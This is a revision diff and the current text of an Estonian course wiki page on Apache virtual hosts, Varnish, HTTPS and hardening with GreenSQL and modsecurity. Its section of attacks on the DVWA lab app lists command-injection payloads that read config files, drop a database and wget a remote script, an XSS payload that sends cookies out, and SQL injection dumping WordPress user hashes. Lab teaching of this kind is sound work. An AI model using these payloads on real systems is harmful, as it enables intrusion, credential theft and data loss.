Virtualhost apache2 näitel: Difference between revisions

From ICO wiki
Jump to navigationJump to search
Mernits (talk | contribs)
Mernits (talk | contribs)
 
(30 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[[Category:IT infrastruktuuri teenused]]
=Apache seadistamine=
<pre>
<pre>
/etc/hosts
/etc/hosts
Line 23: Line 26:
mkdir -p /var/www/sales.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
        address 192.168.56.201
        netmask 255.255.255.0
EOL
ifup eth1:0
cp /var/www/index.html /var/www/sales.planet.zz
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/www.planet.zz/index.html
Line 38: Line 53:


</source>
</source>
=WordPress tuning=
<source lang="apache">
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName wp.planet.zz
        DocumentRoot /var/www/wordpress
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/wordpress>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>
        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>
        ErrorLog ${APACHE_LOG_DIR}/error.log
        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn
        CustomLog ${APACHE_LOG_DIR}/access.log combined
    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>
</VirtualHost>
</source>
Pange tähele muudetud Directory seadeid.
<Directory /var/www/wordpress>
AllowOverride All
<source lang="bash">
echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite
a2enmod headers
a2enmod expires
</source>
Selle rea võib lisada alglaadimisel käivitatavasse faili ''/etc/rc.local''
Paigaldage oma valitud cace plugin wordpressile.


=Varnish=
=Varnish=
Line 53: Line 134:
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
#testimiseks
grep ':80' *
service apache2 restart
service apache2 restart
#testimiseks
netstat -lntp
netstat -lntp
#installeerime varnish cache
apt-get install varnish
apt-get install varnish
vim /etc/default/varnish
vim /etc/default/varnish
Line 119: Line 209:
Tee apache2 teenusele restart
Tee apache2 teenusele restart
<source lang="bash">
<source lang="bash">
service2 apache restart
service apache2 restart
</source>
</source>


Line 153: Line 243:
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req
openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req


<pre>
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
</pre>


sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem
sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem
Line 213: Line 325:
</source>
</source>


kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):
<source lang="bash">
8.8.8.8;mysqladmin DROP dvwa -y;
</source>
kuvada failide infot:
<source lang="bash">
8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz
</source>
skripti laadimine serverisse ning sellele käivitusbiti andmine:
<source lang="bash">
8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh
</source>


Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
Line 247: Line 373:


4' union select user_login,user_pass from wp.wp_users; #
4' union select user_login,user_pass from wp.wp_users; #
3' union  select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #
</source>
=GreenSQL firewall=
<source lang="bash">
wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb
dpkg -i greensql-fw_1.3.0_amd64.deb
apt-get install -f
#Modify existing virtualhost or create new virtualhost.
cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql
cd greensql
chmod 0777 templates_c
</source>
</source>
Kasutajanimi veebiliidesel on '''admin''' ja parool '''pwd'''.
Muutke DVWA config failis andmebaasi asukohta:
<pre>
$_DVWA[ 'db_server' ] = '127.0.0.1:3305';
</pre>
<source lang="bash">
#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start
</source>
=modsecurity=
==installeerimine==
<source lang="bash">
apt-get install libapache2-mod-security2
</source>
Muutke faili '''/etc/apache2/mods-available/security2.conf'''
<source lang="apache">
<IfModule security2_module>
        # Default Debian dir for modsecurity's persistent data
        SecDataDir /var/cache/modsecurity
        # Include all the *.conf files in /etc/modsecurity.
        # Keeping your local configuration in that directory
        # will allow for an easy upgrade of THIS file and
        # make your life easier
        IncludeOptional /etc/modsecurity/*.conf
        IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf
        IncludeOptional /usr/share/modsecurity-crs/activated_rules/*.conf
        SecRuleEngine On
</IfModule>
</source>
Teeme nimelingi modsecurity reeglite seadistamiseks:
<source lang="bash">
ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/
</source>
=Apache2 tweaks=
<source lang="apache">
ServerSignature Off
ServerTokens Prod
</source>
http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3
== Apache testimine ==
Lisaks ab'le on olemas ka teisi utiliite:
1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi <br>
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php <br>
3. OpenWebLoad - http://openwebload.sourceforge.net/#download <br>
4. Allmon - https://code.google.com/p/allmon/downloads/list <br>
5. CLIF - http://clif.ow2.org/download/index.html <br>
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/ <br>
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/ <br>
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/ <br>
9. FWPTT - http://sourceforge.net/projects/fwptt/files/ <br>
10. http_load - http://www.acme.com/software/http_load/ <br>

Latest revision as of 12:19, 4 May 2015

Apache seadistamine

/etc/hosts

192.168.56.101  www.planet.zz
192.168.56.101  sales.planet.zz
ping www.planet.zz

ping sales.planet.zz    


apt-get update     
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz


cat >> /etc/network/interfaces <<EOL
auto eth1:0
iface eth1:0 inet static
        address 192.168.56.201
        netmask 255.255.255.0

EOL

ifup eth1:0

cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz 
vim sales.planet.zz 

a2ensite www.planet.zz
a2ensite sales.planet.zz 
service apache2 reload

WordPress tuning

<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        ServerName wp.planet.zz
        DocumentRoot /var/www/wordpress
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/wordpress>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride All
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>

        ErrorLog ${APACHE_LOG_DIR}/error.log

        # Possible values include: debug, info, notice, warn, error, crit,
        # alert, emerg.
        LogLevel warn

        CustomLog ${APACHE_LOG_DIR}/access.log combined

    Alias /doc/ "/usr/share/doc/"
    <Directory "/usr/share/doc/">
        Options Indexes MultiViews FollowSymLinks
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.0/255.0.0.0 ::1/128
    </Directory>

</VirtualHost>

Pange tähele muudetud Directory seadeid. <Directory /var/www/wordpress> AllowOverride All


echo '-1000' > /proc/$(pidof mysqld)/oom_score_adj
a2enmod rewrite 
a2enmod headers 
a2enmod expires

Selle rea võib lisada alglaadimisel käivitatavasse faili /etc/rc.local


Paigaldage oma valitud cace plugin wordpressile.

Varnish

Esmaselt tõstame apache2 porti 8080

/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i

#testimiseks
grep ':80' *


service apache2 restart

#testimiseks
netstat -lntp

#installeerime varnish cache
apt-get install varnish
vim /etc/default/varnish
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"

Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine

sub vcl_recv {

  # Add a unique header containing the client address

  remove req.http.X-Forwarded-For;

  set    req.http.X-Forwarded-For = client.ip;

  # [...]

}

service varnish restart

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

cd /etc/apache2/sites-available/

Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

nano wp

Sinna tuleb kirjutada CustomLog'i rea asemele

CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

cd /etc/apache2/conf.d/

Tee sinna uus fail nimega näiteks varnishlog.conf

nano varnishlog.conf

Kirjuta sinna see rida

LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined

Tee apache2 teenusele restart

service apache2 restart

DVWA ründed

HTTPS konfigureerimine

ssh-keygen


Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key

Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
|            .    |
|           + .   |
|          o +    |
|           * o   |
|        S + O    |
|       ..+ + + . |
|       ...o o =  |
|        o+   o . |
|       .o.    E  |
+-----------------+

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:EE
State or Province Name (full name) [Some-State]:Harjumaa
Locality Name (eg, city) []:Tallinn
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Planet 
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:www.planet.zz
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

ServerName      www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile    /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key


a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

ID kaart

ID kaardiga autentimine Apache2 veebiserveriga


DVWA ründed

cmd exec

8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php


8.8.8.8; ls -l 
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//'  ../../../../wordpress/wp-config.php


Loon faili kala /var/tmp kataloogi

8.8.8.8; touch /var/tmp/kala.txt

Ning kontrollin kas fail loodi

8.8.8.8; ls /var/tmp/

kustutada andmebaas (eelnevalt uurida andmebaasi nime ning parooli):

8.8.8.8;mysqladmin DROP dvwa -y;

kuvada failide infot:

8.8.8.8;cat /etc/apache2/sites-enabled/www.planet.zz

skripti laadimine serverisse ning sellele käivitusbiti andmine:

8.8.8.8; wget http://enos.itcollege.ee/~kloodus/osadmin/skript.sh -O /var/tmp/skript; chmod +x /var/tmp/skript/skript.sh

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)

; grep session.cookie_httponly /etc/php5/apache2/php.ini

Väljund:

  • kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

session.cookie_httponly = 1

  • kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

session.cookie_httponly = 0

XSS

<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>

veel XSSi

%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E

SQLi

#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --


2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --


3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --

4' union select user_login,user_pass from wp.wp_users; #

3' union  select TABLE_NAME,concat(COLUMN_NAME,'-','LISA') from information_schema.columns; #

GreenSQL firewall

wget http://elab.itcollege.ee:8000/Day3/greensql-fw_1.3.0_amd64.deb

dpkg -i greensql-fw_1.3.0_amd64.deb

apt-get install -f

#Modify existing virtualhost or create new virtualhost.

cd /var/www/EXISTINGORNEW
ln -s /usr/share/greensql-fw/ greensql

cd greensql
chmod 0777 templates_c

Kasutajanimi veebiliidesel on admin ja parool pwd.


Muutke DVWA config failis andmebaasi asukohta:

$_DVWA[ 'db_server' ] = '127.0.0.1:3305';


#lisage faili /etc/rc.local järgmine ride ENNE exit 0 rida
service greensql-fw start

modsecurity

installeerimine

apt-get install libapache2-mod-security2


Muutke faili /etc/apache2/mods-available/security2.conf

<IfModule security2_module>
        # Default Debian dir for modsecurity's persistent data
        SecDataDir /var/cache/modsecurity

        # Include all the *.conf files in /etc/modsecurity.
        # Keeping your local configuration in that directory
        # will allow for an easy upgrade of THIS file and
        # make your life easier
        IncludeOptional /etc/modsecurity/*.conf
        IncludeOptional /usr/share/modsecurity-crs/base_rules/*.conf
        IncludeOptional /usr/share/modsecurity-crs/activated_rules/*.conf

        SecRuleEngine On


</IfModule>

Teeme nimelingi modsecurity reeglite seadistamiseks:

ln -s /usr/share/modsecurity-crs/modsecurity_crs_10_setup.conf /etc/modsecurity/

Apache2 tweaks

ServerSignature Off
ServerTokens Prod


http://chandank.com/webservers/apache/apache-web-server-hardening-security?start=3


Apache testimine

Lisaks ab'le on olemas ka teisi utiliite:


1.Apache JMeter - http://jmeter.apache.org/download_jmeter.cgi
2. httperf - http://www.hpl.hp.com/research/linux/httperf/download.php
3. OpenWebLoad - http://openwebload.sourceforge.net/#download
4. Allmon - https://code.google.com/p/allmon/downloads/list
5. CLIF - http://clif.ow2.org/download/index.html
6. curl-loader - http://sourceforge.net/projects/curl-loader/files/
7. deluge(alates 2002 ei ole uusi versioone) - http://sourceforge.net/projects/deluge/
8. dieseltest(ainult windowsile ning pole uuendatud aastast 2001) - http://sourceforge.net/projects/dieseltest/
9. FWPTT - http://sourceforge.net/projects/fwptt/files/
10. http_load - http://www.acme.com/software/http_load/